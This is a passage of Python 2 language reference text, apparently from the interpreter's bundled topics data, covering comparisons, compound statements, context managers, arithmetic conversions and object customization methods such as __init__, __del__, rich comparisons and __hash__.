Also unlike C, expressions like "a < b < c" have the\ninterpretation that is conventional in mathematics:\n\n comparison ::= or_expr ( comp_operator or_expr )*\n comp_operator ::= "<" | ">" | "==" | ">=" | "<=" | "<>" | "!="\n | "is" ["not"] | ["not"] "in"\n\nComparisons yield boolean values: "True" or "False".\n\nComparisons can be chained arbitrarily, e.g., "x < y <= z" is\nequivalent to "x < y and y <= z", except that "y" is evaluated only\nonce (but in both cases "z" is not evaluated at all when "x < y" is\nfound to be false).\n\nFormally, if *a*, *b*, *c*, ..., *y*, *z* are expressions and *op1*,\n*op2*, ..., *opN* are comparison operators, then "a op1 b op2 c ... y\nopN z" is equivalent to "a op1 b and b op2 c and ... y opN z", except\nthat each expression is evaluated at most once.\n\nNote that "a op1 b op2 c" doesn\'t imply any kind of comparison between\n*a* and *c*, so that, e.g., "x < y > z" is perfectly legal (though\nperhaps not pretty).\n\nThe forms "<>" and "!=" are equivalent; for consistency with C, "!="\nis preferred; where "!=" is mentioned below "<>" is also accepted.\nThe "<>" spelling is considered obsolescent.\n\nThe operators "<", ">", "==", ">=", "<=", and "!=" compare the values\nof two objects. The objects need not have the same type. If both are\nnumbers, they are converted to a common type. Otherwise, objects of\ndifferent types *always* compare unequal, and are ordered consistently\nbut arbitrarily. You can control comparison behavior of objects of\nnon-built-in types by defining a "__cmp__" method or rich comparison\nmethods like "__gt__", described in section Special method names.\n\n(This unusual definition of comparison was used to simplify the\ndefinition of operations like sorting and the "in" and "not in"\noperators. In the future, the comparison rules for objects of\ndifferent types are likely to change.)\n\nComparison of objects of the same type depends on the type:\n\n* Numbers are compared arithmetically.\n\n* Strings are compared lexicographically using the numeric\n equivalents (the result of the built-in function "ord()") of their\n characters. Unicode and 8-bit strings are fully interoperable in\n this behavior. [4]\n\n* Tuples and lists are compared lexicographically using comparison\n of corresponding elements. This means that to compare equal, each\n element must compare equal and the two sequences must be of the same\n type and have the same length.\n\n If not equal, the sequences are ordered the same as their first\n differing elements. For example, "cmp([1,2,x], [1,2,y])" returns\n the same as "cmp(x,y)". If the corresponding element does not\n exist, the shorter sequence is ordered first (for example, "[1,2] <\n [1,2,3]").\n\n* Mappings (dictionaries) compare equal if and only if their sorted\n (key, value) lists compare equal. [5] Outcomes other than equality\n are resolved consistently, but are not otherwise defined. [6]\n\n* Most other objects of built-in types compare unequal unless they\n are the same object; the choice whether one object is considered\n smaller or larger than another one is made arbitrarily but\n consistently within one execution of a program.\n\nThe operators "in" and "not in" test for collection membership. "x in\ns" evaluates to true if *x* is a member of the collection *s*, and\nfalse otherwise. "x not in s" returns the negation of "x in s". 
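The chaining rule stated earlier in this entry (each expression evaluated at most once) can be observed with a function that reports when it runs; a sketch (Python 2; the names are illustrative):

   def middle():
       print "evaluated"
       return 5

   print 1 < middle() <= 9        # prints "evaluated" once, then True
   print 3 < 2 < middle()         # False; middle() is never called at all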
The\ncollection membership test has traditionally been bound to sequences;\nan object is a member of a collection if the collection is a sequence\nand contains an element equal to that object. However, it makes sense\nfor many other object types to support membership tests without being\na sequence. In particular, dictionaries (for keys) and sets support\nmembership testing.\n\nFor the list and tuple types, "x in y" is true if and only if there\nexists an index *i* such that "x == y[i]" is true.\n\nFor the Unicode and string types, "x in y" is true if and only if *x*\nis a substring of *y*. An equivalent test is "y.find(x) != -1".\nNote, *x* and *y* need not be the same type; consequently, "u\'ab\' in\n\'abc\'" will return "True". Empty strings are always considered to be a\nsubstring of any other string, so """ in "abc"" will return "True".\n\nChanged in version 2.3: Previously, *x* was required to be a string of\nlength "1".\n\nFor user-defined classes which define the "__contains__()" method, "x\nin y" is true if and only if "y.__contains__(x)" is true.\n\nFor user-defined classes which do not define "__contains__()" but do\ndefine "__iter__()", "x in y" is true if some value "z" with "x == z"\nis produced while iterating over "y". If an exception is raised\nduring the iteration, it is as if "in" raised that exception.\n\nLastly, the old-style iteration protocol is tried: if a class defines\n"__getitem__()", "x in y" is true if and only if there is a non-\nnegative integer index *i* such that "x == y[i]", and all lower\ninteger indices do not raise an "IndexError" exception. (If any other\nexception is raised, it is as if "in" raised that exception).\n\nThe operator "not in" is defined to have the inverse truth value of\n"in".\n\nThe operators "is" and "is not" test for object identity: "x is y" is\ntrue if and only if *x* and *y* are the same object. "x is not y"\nyields the inverse truth value. [7]\n', 'compound': u'\nCompound statements\n*******************\n\nCompound statements contain (groups of) other statements; they affect\nor control the execution of those other statements in some way. In\ngeneral, compound statements span multiple lines, although in simple\nincarnations a whole compound statement may be contained in one line.\n\nThe "if", "while" and "for" statements implement traditional control\nflow constructs. "try" specifies exception handlers and/or cleanup\ncode for a group of statements. Function and class definitions are\nalso syntactically compound statements.\n\nCompound statements consist of one or more \'clauses.\' A clause\nconsists of a header and a \'suite.\' The clause headers of a\nparticular compound statement are all at the same indentation level.\nEach clause header begins with a uniquely identifying keyword and ends\nwith a colon. A suite is a group of statements controlled by a\nclause. A suite can be one or more semicolon-separated simple\nstatements on the same line as the header, following the header\'s\ncolon, or it can be one or more indented statements on subsequent\nlines. 
Only the latter form of suite can contain nested compound\nstatements; the following is illegal, mostly because it wouldn\'t be\nclear to which "if" clause a following "else" clause would belong:\n\n if test1: if test2: print x\n\nAlso note that the semicolon binds tighter than the colon in this\ncontext, so that in the following example, either all or none of the\n"print" statements are executed:\n\n if x < y < z: print x; print y; print z\n\nSummarizing:\n\n compound_stmt ::= if_stmt\n | while_stmt\n | for_stmt\n | try_stmt\n | with_stmt\n | funcdef\n | classdef\n | decorated\n suite ::= stmt_list NEWLINE | NEWLINE INDENT statement+ DEDENT\n statement ::= stmt_list NEWLINE | compound_stmt\n stmt_list ::= simple_stmt (";" simple_stmt)* [";"]\n\nNote that statements always end in a "NEWLINE" possibly followed by a\n"DEDENT". Also note that optional continuation clauses always begin\nwith a keyword that cannot start a statement, thus there are no\nambiguities (the \'dangling "else"\' problem is solved in Python by\nrequiring nested "if" statements to be indented).\n\nThe formatting of the grammar rules in the following sections places\neach clause on a separate line for clarity.\n\n\nThe "if" statement\n==================\n\nThe "if" statement is used for conditional execution:\n\n if_stmt ::= "if" expression ":" suite\n ( "elif" expression ":" suite )*\n ["else" ":" suite]\n\nIt selects exactly one of the suites by evaluating the expressions one\nby one until one is found to be true (see section Boolean operations\nfor the definition of true and false); then that suite is executed\n(and no other part of the "if" statement is executed or evaluated).\nIf all expressions are false, the suite of the "else" clause, if\npresent, is executed.\n\n\nThe "while" statement\n=====================\n\nThe "while" statement is used for repeated execution as long as an\nexpression is true:\n\n while_stmt ::= "while" expression ":" suite\n ["else" ":" suite]\n\nThis repeatedly tests the expression and, if it is true, executes the\nfirst suite; if the expression is false (which may be the first time\nit is tested) the suite of the "else" clause, if present, is executed\nand the loop terminates.\n\nA "break" statement executed in the first suite terminates the loop\nwithout executing the "else" clause\'s suite. A "continue" statement\nexecuted in the first suite skips the rest of the suite and goes back\nto testing the expression.\n\n\nThe "for" statement\n===================\n\nThe "for" statement is used to iterate over the elements of a sequence\n(such as a string, tuple or list) or other iterable object:\n\n for_stmt ::= "for" target_list "in" expression_list ":" suite\n ["else" ":" suite]\n\nThe expression list is evaluated once; it should yield an iterable\nobject. An iterator is created for the result of the\n"expression_list". The suite is then executed once for each item\nprovided by the iterator, in the order of ascending indices. Each\nitem in turn is assigned to the target list using the standard rules\nfor assignments, and then the suite is executed. When the items are\nexhausted (which is immediately when the sequence is empty), the suite\nin the "else" clause, if present, is executed, and the loop\nterminates.\n\nA "break" statement executed in the first suite terminates the loop\nwithout executing the "else" clause\'s suite. 
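For instance, the interaction of "break" with the loop "else" clause (illustrative values):

   needle = 7
   for x in [2, 4, 6, 8]:
       if x == needle:
           print "found", x
           break                  # would skip the "else" clause below
   else:
       print "not found"          # runs only because no "break" fired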
A "continue" statement\nexecuted in the first suite skips the rest of the suite and continues\nwith the next item, or with the "else" clause if there was no next\nitem.\n\nThe suite may assign to the variable(s) in the target list; this does\nnot affect the next item assigned to it.\n\nThe target list is not deleted when the loop is finished, but if the\nsequence is empty, it will not have been assigned to at all by the\nloop. Hint: the built-in function "range()" returns a sequence of\nintegers suitable to emulate the effect of Pascal\'s "for i := a to b\ndo"; e.g., "range(3)" returns the list "[0, 1, 2]".\n\nNote: There is a subtlety when the sequence is being modified by the\n loop (this can only occur for mutable sequences, i.e. lists). An\n internal counter is used to keep track of which item is used next,\n and this is incremented on each iteration. When this counter has\n reached the length of the sequence the loop terminates. This means\n that if the suite deletes the current (or a previous) item from the\n sequence, the next item will be skipped (since it gets the index of\n the current item which has already been treated). Likewise, if the\n suite inserts an item in the sequence before the current item, the\n current item will be treated again the next time through the loop.\n This can lead to nasty bugs that can be avoided by making a\n temporary copy using a slice of the whole sequence, e.g.,\n\n for x in a[:]:\n if x < 0: a.remove(x)\n\n\nThe "try" statement\n===================\n\nThe "try" statement specifies exception handlers and/or cleanup code\nfor a group of statements:\n\n try_stmt ::= try1_stmt | try2_stmt\n try1_stmt ::= "try" ":" suite\n ("except" [expression [("as" | ",") identifier]] ":" suite)+\n ["else" ":" suite]\n ["finally" ":" suite]\n try2_stmt ::= "try" ":" suite\n "finally" ":" suite\n\nChanged in version 2.5: In previous versions of Python,\n"try"..."except"..."finally" did not work. "try"..."except" had to be\nnested in "try"..."finally".\n\nThe "except" clause(s) specify one or more exception handlers. When no\nexception occurs in the "try" clause, no exception handler is\nexecuted. When an exception occurs in the "try" suite, a search for an\nexception handler is started. This search inspects the except clauses\nin turn until one is found that matches the exception. An expression-\nless except clause, if present, must be last; it matches any\nexception. For an except clause with an expression, that expression\nis evaluated, and the clause matches the exception if the resulting\nobject is "compatible" with the exception. An object is compatible\nwith an exception if it is the class or a base class of the exception\nobject, or a tuple containing an item compatible with the exception.\n\nIf no except clause matches the exception, the search for an exception\nhandler continues in the surrounding code and on the invocation stack.\n[1]\n\nIf the evaluation of an expression in the header of an except clause\nraises an exception, the original search for a handler is canceled and\na search starts for the new exception in the surrounding code and on\nthe call stack (it is treated as if the entire "try" statement raised\nthe exception).\n\nWhen a matching except clause is found, the exception is assigned to\nthe target specified in that except clause, if present, and the except\nclause\'s suite is executed. All except clauses must have an\nexecutable block. When the end of this block is reached, execution\ncontinues normally after the entire try statement. 
(This means that\nif two nested handlers exist for the same exception, and the exception\noccurs in the try clause of the inner handler, the outer handler will\nnot handle the exception.)\n\nBefore an except clause\'s suite is executed, details about the\nexception are assigned to three variables in the "sys" module:\n"sys.exc_type" receives the object identifying the exception;\n"sys.exc_value" receives the exception\'s parameter;\n"sys.exc_traceback" receives a traceback object (see section The\nstandard type hierarchy) identifying the point in the program where\nthe exception occurred. These details are also available through the\n"sys.exc_info()" function, which returns a tuple "(exc_type,\nexc_value, exc_traceback)". Use of the corresponding variables is\ndeprecated in favor of this function, since their use is unsafe in a\nthreaded program. As of Python 1.5, the variables are restored to\ntheir previous values (before the call) when returning from a function\nthat handled an exception.\n\nThe optional "else" clause is executed if and when control flows off\nthe end of the "try" clause. [2] Exceptions in the "else" clause are\nnot handled by the preceding "except" clauses.\n\nIf "finally" is present, it specifies a \'cleanup\' handler. The "try"\nclause is executed, including any "except" and "else" clauses. If an\nexception occurs in any of the clauses and is not handled, the\nexception is temporarily saved. The "finally" clause is executed. If\nthere is a saved exception, it is re-raised at the end of the\n"finally" clause. If the "finally" clause raises another exception or\nexecutes a "return" or "break" statement, the saved exception is\ndiscarded:\n\n >>> def f():\n ... try:\n ... 1/0\n ... finally:\n ... return 42\n ...\n >>> f()\n 42\n\nThe exception information is not available to the program during\nexecution of the "finally" clause.\n\nWhen a "return", "break" or "continue" statement is executed in the\n"try" suite of a "try"..."finally" statement, the "finally" clause is\nalso executed \'on the way out.\' A "continue" statement is illegal in\nthe "finally" clause. (The reason is a problem with the current\nimplementation --- this restriction may be lifted in the future).\n\nThe return value of a function is determined by the last "return"\nstatement executed. Since the "finally" clause always executes, a\n"return" statement executed in the "finally" clause will always be the\nlast one executed:\n\n >>> def foo():\n ... try:\n ... return \'try\'\n ... finally:\n ... return \'finally\'\n ...\n >>> foo()\n \'finally\'\n\nAdditional information on exceptions can be found in section\nExceptions, and information on using the "raise" statement to generate\nexceptions may be found in section The raise statement.\n\n\nThe "with" statement\n====================\n\nNew in version 2.5.\n\nThe "with" statement is used to wrap the execution of a block with\nmethods defined by a context manager (see section With Statement\nContext Managers). This allows common "try"..."except"..."finally"\nusage patterns to be encapsulated for convenient reuse.\n\n with_stmt ::= "with" with_item ("," with_item)* ":" suite\n with_item ::= expression ["as" target]\n\nThe execution of the "with" statement with one "item" proceeds as\nfollows:\n\n1. The context expression (the expression given in the "with_item")\n is evaluated to obtain a context manager.\n\n2. The context manager\'s "__exit__()" is loaded for later use.\n\n3. The context manager\'s "__enter__()" method is invoked.\n\n4. 
If a target was included in the "with" statement, the return\n value from "__enter__()" is assigned to it.\n\n Note: The "with" statement guarantees that if the "__enter__()"\n method returns without an error, then "__exit__()" will always be\n called. Thus, if an error occurs during the assignment to the\n target list, it will be treated the same as an error occurring\n within the suite would be. See step 6 below.\n\n5. The suite is executed.\n\n6. The context manager\'s "__exit__()" method is invoked. If an\n exception caused the suite to be exited, its type, value, and\n traceback are passed as arguments to "__exit__()". Otherwise, three\n "None" arguments are supplied.\n\n If the suite was exited due to an exception, and the return value\n from the "__exit__()" method was false, the exception is reraised.\n If the return value was true, the exception is suppressed, and\n execution continues with the statement following the "with"\n statement.\n\n If the suite was exited for any reason other than an exception, the\n return value from "__exit__()" is ignored, and execution proceeds\n at the normal location for the kind of exit that was taken.\n\nWith more than one item, the context managers are processed as if\nmultiple "with" statements were nested:\n\n with A() as a, B() as b:\n suite\n\nis equivalent to\n\n with A() as a:\n with B() as b:\n suite\n\nNote: In Python 2.5, the "with" statement is only allowed when the\n "with_statement" feature has been enabled. It is always enabled in\n Python 2.6.\n\nChanged in version 2.7: Support for multiple context expressions.\n\nSee also:\n\n **PEP 0343** - The "with" statement\n The specification, background, and examples for the Python "with"\n statement.\n\n\nFunction definitions\n====================\n\nA function definition defines a user-defined function object (see\nsection The standard type hierarchy):\n\n decorated ::= decorators (classdef | funcdef)\n decorators ::= decorator+\n decorator ::= "@" dotted_name ["(" [argument_list [","]] ")"] NEWLINE\n funcdef ::= "def" funcname "(" [parameter_list] ")" ":" suite\n dotted_name ::= identifier ("." identifier)*\n parameter_list ::= (defparameter ",")*\n ( "*" identifier ["," "**" identifier]\n | "**" identifier\n | defparameter [","] )\n defparameter ::= parameter ["=" expression]\n sublist ::= parameter ("," parameter)* [","]\n parameter ::= identifier | "(" sublist ")"\n funcname ::= identifier\n\nA function definition is an executable statement. Its execution binds\nthe function name in the current local namespace to a function object\n(a wrapper around the executable code for the function). This\nfunction object contains a reference to the current global namespace\nas the global namespace to be used when the function is called.\n\nThe function definition does not execute the function body; this gets\nexecuted only when the function is called. [3]\n\nA function definition may be wrapped by one or more *decorator*\nexpressions. Decorator expressions are evaluated when the function is\ndefined, in the scope that contains the function definition. The\nresult must be a callable, which is invoked with the function object\nas the only argument. The returned value is bound to the function name\ninstead of the function object. Multiple decorators are applied in\nnested fashion. 
For example, the following code:\n\n @f1(arg)\n @f2\n def func(): pass\n\nis equivalent to:\n\n def func(): pass\n func = f1(arg)(f2(func))\n\nWhen one or more top-level *parameters* have the form *parameter* "="\n*expression*, the function is said to have "default parameter values."\nFor a parameter with a default value, the corresponding *argument* may\nbe omitted from a call, in which case the parameter\'s default value is\nsubstituted. If a parameter has a default value, all following\nparameters must also have a default value --- this is a syntactic\nrestriction that is not expressed by the grammar.\n\n**Default parameter values are evaluated when the function definition\nis executed.** This means that the expression is evaluated once, when\nthe function is defined, and that the same "pre-computed" value is\nused for each call. This is especially important to understand when a\ndefault parameter is a mutable object, such as a list or a dictionary:\nif the function modifies the object (e.g. by appending an item to a\nlist), the default value is in effect modified. This is generally not\nwhat was intended. A way around this is to use "None" as the\ndefault, and explicitly test for it in the body of the function, e.g.:\n\n def whats_on_the_telly(penguin=None):\n if penguin is None:\n penguin = []\n penguin.append("property of the zoo")\n return penguin\n\nFunction call semantics are described in more detail in section Calls.\nA function call always assigns values to all parameters mentioned in\nthe parameter list, either from position arguments, from keyword\narguments, or from default values. If the form ""*identifier"" is\npresent, it is initialized to a tuple receiving any excess positional\nparameters, defaulting to the empty tuple. If the form\n""**identifier"" is present, it is initialized to a new dictionary\nreceiving any excess keyword arguments, defaulting to a new empty\ndictionary.\n\nIt is also possible to create anonymous functions (functions not bound\nto a name), for immediate use in expressions. This uses lambda\nexpressions, described in section Lambdas. Note that the lambda\nexpression is merely a shorthand for a simplified function definition;\na function defined in a ""def"" statement can be passed around or\nassigned to another name just like a function defined by a lambda\nexpression. The ""def"" form is actually more powerful since it\nallows the execution of multiple statements.\n\n**Programmer\'s note:** Functions are first-class objects. A ""def""\nform executed inside a function definition defines a local function\nthat can be returned or passed around. Free variables used in the\nnested function can access the local variables of the function\ncontaining the def. See section Naming and binding for details.\n\n\nClass definitions\n=================\n\nA class definition defines a class object (see section The standard\ntype hierarchy):\n\n classdef ::= "class" classname [inheritance] ":" suite\n inheritance ::= "(" [expression_list] ")"\n classname ::= identifier\n\nA class definition is an executable statement. It first evaluates the\ninheritance list, if present. Each item in the inheritance list\nshould evaluate to a class object or class type which allows\nsubclassing. The class\'s suite is then executed in a new execution\nframe (see section Naming and binding), using a newly created local\nnamespace and the original global namespace. (Usually, the suite\ncontains only function definitions.) 
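As a brief aside, the note above about nested functions and free variables can be made concrete (Python 2 sketch; the names are illustrative):

   def make_counter():
       count = [0]                # a mutable cell; Python 2 has no "nonlocal"
       def bump():
           count[0] += 1          # the free variable "count" is found in the enclosing scope
           return count[0]
       return bump                # the local function is returned as a value

   tick = make_counter()
   print tick(), tick(), tick()   # 1 2 3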
When the class\'s suite finishes\nexecution, its execution frame is discarded but its local namespace is\nsaved. [4] A class object is then created using the inheritance list\nfor the base classes and the saved local namespace for the attribute\ndictionary. The class name is bound to this class object in the\noriginal local namespace.\n\n**Programmer\'s note:** Variables defined in the class definition are\nclass variables; they are shared by all instances. To create instance\nvariables, they can be set in a method with "self.name = value". Both\nclass and instance variables are accessible through the notation\n""self.name"", and an instance variable hides a class variable with\nthe same name when accessed in this way. Class variables can be used\nas defaults for instance variables, but using mutable values there can\nlead to unexpected results. For *new-style class*es, descriptors can\nbe used to create instance variables with different implementation\ndetails.\n\nClass definitions, like function definitions, may be wrapped by one or\nmore *decorator* expressions. The evaluation rules for the decorator\nexpressions are the same as for functions. The result must be a class\nobject, which is then bound to the class name.\n\n-[ Footnotes ]-\n\n[1] The exception is propagated to the invocation stack unless\n there is a "finally" clause which happens to raise another\n exception. That new exception causes the old one to be lost.\n\n[2] Currently, control "flows off the end" except in the case of\n an exception or the execution of a "return", "continue", or\n "break" statement.\n\n[3] A string literal appearing as the first statement in the\n function body is transformed into the function\'s "__doc__"\n attribute and therefore the function\'s *docstring*.\n\n[4] A string literal appearing as the first statement in the class\n body is transformed into the namespace\'s "__doc__" item and\n therefore the class\'s *docstring*.\n', 'context-managers': u'\nWith Statement Context Managers\n*******************************\n\nNew in version 2.5.\n\nA *context manager* is an object that defines the runtime context to\nbe established when executing a "with" statement. The context manager\nhandles the entry into, and the exit from, the desired runtime context\nfor the execution of the block of code. Context managers are normally\ninvoked using the "with" statement (described in section The with\nstatement), but can also be used by directly invoking their methods.\n\nTypical uses of context managers include saving and restoring various\nkinds of global state, locking and unlocking resources, closing opened\nfiles, etc.\n\nFor more information on context managers, see Context Manager Types.\n\nobject.__enter__(self)\n\n Enter the runtime context related to this object. The "with"\n statement will bind this method\'s return value to the target(s)\n specified in the "as" clause of the statement, if any.\n\nobject.__exit__(self, exc_type, exc_value, traceback)\n\n Exit the runtime context related to this object. The parameters\n describe the exception that caused the context to be exited. If the\n context was exited without an exception, all three arguments will\n be "None".\n\n If an exception is supplied, and the method wishes to suppress the\n exception (i.e., prevent it from being propagated), it should\n return a true value. 
Otherwise, the exception will be processed\n normally upon exit from this method.\n\n Note that "__exit__()" methods should not reraise the passed-in\n exception; this is the caller\'s responsibility.\n\nSee also:\n\n **PEP 0343** - The "with" statement\n The specification, background, and examples for the Python "with"\n statement.\n', 'continue': u'\nThe "continue" statement\n************************\n\n continue_stmt ::= "continue"\n\n"continue" may only occur syntactically nested in a "for" or "while"\nloop, but not nested in a function or class definition or "finally"\nclause within that loop. It continues with the next cycle of the\nnearest enclosing loop.\n\nWhen "continue" passes control out of a "try" statement with a\n"finally" clause, that "finally" clause is executed before really\nstarting the next loop cycle.\n', 'conversions': u'\nArithmetic conversions\n**********************\n\nWhen a description of an arithmetic operator below uses the phrase\n"the numeric arguments are converted to a common type," the arguments\nare coerced using the coercion rules listed at Coercion rules. If\nboth arguments are standard numeric types, the following coercions are\napplied:\n\n* If either argument is a complex number, the other is converted to\n complex;\n\n* otherwise, if either argument is a floating point number, the\n other is converted to floating point;\n\n* otherwise, if either argument is a long integer, the other is\n converted to long integer;\n\n* otherwise, both must be plain integers and no conversion is\n necessary.\n\nSome additional rules apply for certain operators (e.g., a string left\nargument to the \'%\' operator). Extensions can define their own\ncoercions.\n', 'customization': u'\nBasic customization\n*******************\n\nobject.__new__(cls[, ...])\n\n Called to create a new instance of class *cls*. "__new__()" is a\n static method (special-cased so you need not declare it as such)\n that takes the class of which an instance was requested as its\n first argument. The remaining arguments are those passed to the\n object constructor expression (the call to the class). The return\n value of "__new__()" should be the new object instance (usually an\n instance of *cls*).\n\n Typical implementations create a new instance of the class by\n invoking the superclass\'s "__new__()" method using\n "super(currentclass, cls).__new__(cls[, ...])" with appropriate\n arguments and then modifying the newly-created instance as\n necessary before returning it.\n\n If "__new__()" returns an instance of *cls*, then the new\n instance\'s "__init__()" method will be invoked like\n "__init__(self[, ...])", where *self* is the new instance and the\n remaining arguments are the same as were passed to "__new__()".\n\n If "__new__()" does not return an instance of *cls*, then the new\n instance\'s "__init__()" method will not be invoked.\n\n "__new__()" is intended mainly to allow subclasses of immutable\n types (like int, str, or tuple) to customize instance creation. It\n is also commonly overridden in custom metaclasses in order to\n customize class creation.\n\nobject.__init__(self[, ...])\n\n Called after the instance has been created (by "__new__()"), but\n before it is returned to the caller. The arguments are those\n passed to the class constructor expression. 
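The immutable-subclass use of "__new__()" described above, sketched with an illustrative class:

   class Celsius(float):
       def __new__(cls, degrees):
           if degrees < -273.15:
               raise ValueError("below absolute zero")
           # delegate the actual creation to the immutable base type
           return super(Celsius, cls).__new__(cls, degrees)

   t = Celsius(21.5)
   print t + 1.0                  # 22.5; the instance behaves like a float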
If a base class has an\n "__init__()" method, the derived class\'s "__init__()" method, if\n any, must explicitly call it to ensure proper initialization of the\n base class part of the instance; for example:\n "BaseClass.__init__(self, [args...])".\n\n Because "__new__()" and "__init__()" work together in constructing\n objects ("__new__()" to create it, and "__init__()" to customise\n it), no non-"None" value may be returned by "__init__()"; doing so\n will cause a "TypeError" to be raised at runtime.\n\nobject.__del__(self)\n\n Called when the instance is about to be destroyed. This is also\n called a destructor. If a base class has a "__del__()" method, the\n derived class\'s "__del__()" method, if any, must explicitly call it\n to ensure proper deletion of the base class part of the instance.\n Note that it is possible (though not recommended!) for the\n "__del__()" method to postpone destruction of the instance by\n creating a new reference to it. It may then be called at a later\n time when this new reference is deleted. It is not guaranteed that\n "__del__()" methods are called for objects that still exist when\n the interpreter exits.\n\n Note: "del x" doesn\'t directly call "x.__del__()" --- the former\n decrements the reference count for "x" by one, and the latter is\n only called when "x"\'s reference count reaches zero. Some common\n situations that may prevent the reference count of an object from\n going to zero include: circular references between objects (e.g.,\n a doubly-linked list or a tree data structure with parent and\n child pointers); a reference to the object on the stack frame of\n a function that caught an exception (the traceback stored in\n "sys.exc_traceback" keeps the stack frame alive); or a reference\n to the object on the stack frame that raised an unhandled\n exception in interactive mode (the traceback stored in\n "sys.last_traceback" keeps the stack frame alive). The first\n situation can only be remedied by explicitly breaking the cycles;\n the latter two situations can be resolved by storing "None" in\n "sys.exc_traceback" or "sys.last_traceback". Circular references\n which are garbage are detected when the option cycle detector is\n enabled (it\'s on by default), but can only be cleaned up if there\n are no Python-level "__del__()" methods involved. Refer to the\n documentation for the "gc" module for more information about how\n "__del__()" methods are handled by the cycle detector,\n particularly the description of the "garbage" value.\n\n Warning: Due to the precarious circumstances under which\n "__del__()" methods are invoked, exceptions that occur during\n their execution are ignored, and a warning is printed to\n "sys.stderr" instead. Also, when "__del__()" is invoked in\n response to a module being deleted (e.g., when execution of the\n program is done), other globals referenced by the "__del__()"\n method may already have been deleted or in the process of being\n torn down (e.g. the import machinery shutting down). For this\n reason, "__del__()" methods should do the absolute minimum needed\n to maintain external invariants. 
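A minimal, illustrative sketch of such a conservative\n "__del__()" (the class name "Resource" and the attribute\n "_handle" are hypothetical):\n\n      class Resource(object):\n          def __init__(self, handle):\n              self._handle = handle\n\n          def __del__(self):\n              # Touch as little global state as possible; the\n              # attribute may be missing if __init__ never ran.\n              handle = getattr(self, \'_handle\', None)\n              if handle is not None:\n                  handle.close()\n\n 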
Starting with version 1.5,\n Python guarantees that globals whose name begins with a single\n underscore are deleted from their module before other globals are\n deleted; if no other references to such globals exist, this may\n help in assuring that imported modules are still available at the\n time when the "__del__()" method is called.\n\n See also the "-R" command-line option.\n\nobject.__repr__(self)\n\n Called by the "repr()" built-in function and by string conversions\n (reverse quotes) to compute the "official" string representation of\n an object. If at all possible, this should look like a valid\n Python expression that could be used to recreate an object with the\n same value (given an appropriate environment). If this is not\n possible, a string of the form "<...some useful description...>"\n should be returned. The return value must be a string object. If a\n class defines "__repr__()" but not "__str__()", then "__repr__()"\n is also used when an "informal" string representation of instances\n of that class is required.\n\n This is typically used for debugging, so it is important that the\n representation is information-rich and unambiguous.\n\nobject.__str__(self)\n\n Called by the "str()" built-in function and by the "print"\n statement to compute the "informal" string representation of an\n object. This differs from "__repr__()" in that it does not have to\n be a valid Python expression: a more convenient or concise\n representation may be used instead. The return value must be a\n string object.\n\nobject.__lt__(self, other)\nobject.__le__(self, other)\nobject.__eq__(self, other)\nobject.__ne__(self, other)\nobject.__gt__(self, other)\nobject.__ge__(self, other)\n\n New in version 2.1.\n\n These are the so-called "rich comparison" methods, and are called\n for comparison operators in preference to "__cmp__()" below. The\n correspondence between operator symbols and method names is as\n follows: "x<y" calls "x.__lt__(y)", "x<=y" calls "x.__le__(y)",\n "x==y" calls "x.__eq__(y)", "x!=y" and "x<>y" call "x.__ne__(y)",\n "x>y" calls "x.__gt__(y)", and "x>=y" calls "x.__ge__(y)".\n\n A rich comparison method may return the singleton "NotImplemented"\n if it does not implement the operation for a given pair of\n arguments. By convention, "False" and "True" are returned for a\n successful comparison. However, these methods can return any value,\n so if the comparison operator is used in a Boolean context (e.g.,\n in the condition of an "if" statement), Python will call "bool()"\n on the value to determine if the result is true or false.\n\n There are no implied relationships among the comparison operators.\n The truth of "x==y" does not imply that "x!=y" is false.\n Accordingly, when defining "__eq__()", one should also define\n "__ne__()" so that the operators will behave as expected. 
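For example, a minimal sketch of a class that defines both\n operations (the class name "Pair" is illustrative, not part of the\n language):\n\n      class Pair(object):\n          def __init__(self, a, b):\n              self.a, self.b = a, b\n\n          def __eq__(self, other):\n              # Compare by value; returning NotImplemented lets\n              # Python try the reflected operation on the other\n              # operand.\n              if not isinstance(other, Pair):\n                  return NotImplemented\n              return (self.a, self.b) == (other.a, other.b)\n\n          def __ne__(self, other):\n              result = self.__eq__(other)\n              if result is NotImplemented:\n                  return result\n              return not result\n\n 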
See the\n paragraph on "__hash__()" for some important notes on creating\n *hashable* objects which support custom comparison operations and\n are usable as dictionary keys.\n\n There are no swapped-argument versions of these methods (to be used\n when the left argument does not support the operation but the right\n argument does); rather, "__lt__()" and "__gt__()" are each other\'s\n reflection, "__le__()" and "__ge__()" are each other\'s reflection,\n and "__eq__()" and "__ne__()" are their own reflection.\n\n Arguments to rich comparison methods are never coerced.\n\n To automatically generate ordering operations from a single root\n operation, see "functools.total_ordering()".\n\nobject.__cmp__(self, other)\n\n Called by comparison operations if rich comparison (see above) is\n not defined. Should return a negative integer if "self < other",\n zero if "self == other", a positive integer if "self > other". If\n no "__cmp__()", "__eq__()" or "__ne__()" operation is defined,\n class instances are compared by object identity ("address"). See\n also the description of "__hash__()" for some important notes on\n creating *hashable* objects which support custom comparison\n operations and are usable as dictionary keys. (Note: the\n restriction that exceptions are not propagated by "__cmp__()" has\n been removed since Python 1.5.)\n\nobject.__rcmp__(self, other)\n\n Changed in version 2.1: No longer supported.\n\nobject.__hash__(self)\n\n Called by built-in function "hash()" and for operations on members\n of hashed collections including "set", "frozenset", and "dict".\n "__hash__()" should return an integer. The only required property\n is that objects which compare equal have the same hash value; it is\n advised to somehow mix together (e.g. using exclusive or) the hash\n values for the components of the object that also play a part in\n comparison of objects.\n\n If a class does not define a "__cmp__()" or "__eq__()" method it\n should not define a "__hash__()" operation either; if it defines\n "__cmp__()" or "__eq__()" but not "__hash__()", its instances will\n not be usable in hashed collections. If a class defines mutable\n objects and implements a "__cmp__()" or "__eq__()" method, it\n should not implement "__hash__()", since hashable collection\n implementations require that an object\'s hash value is immutable (if\n the object\'s hash value changes, it will be in the wrong hash\n bucket).\n\n User-defined classes have "__cmp__()" and "__hash__()" methods by\n default; with them, all objects compare unequal (except with\n themselves) and "x.__hash__()" returns a result derived from\n "id(x)".\n\n Classes which inherit a "__hash__()" method from a parent class but\n change the meaning of "__cmp__()" or "__eq__()" such that the hash\n value returned is no longer appropriate (e.g. by switching to a\n value-based concept of equality instead of the default identity\n based equality) can explicitly flag themselves as being unhashable\n by setting "__hash__ = None" in the class definition. 
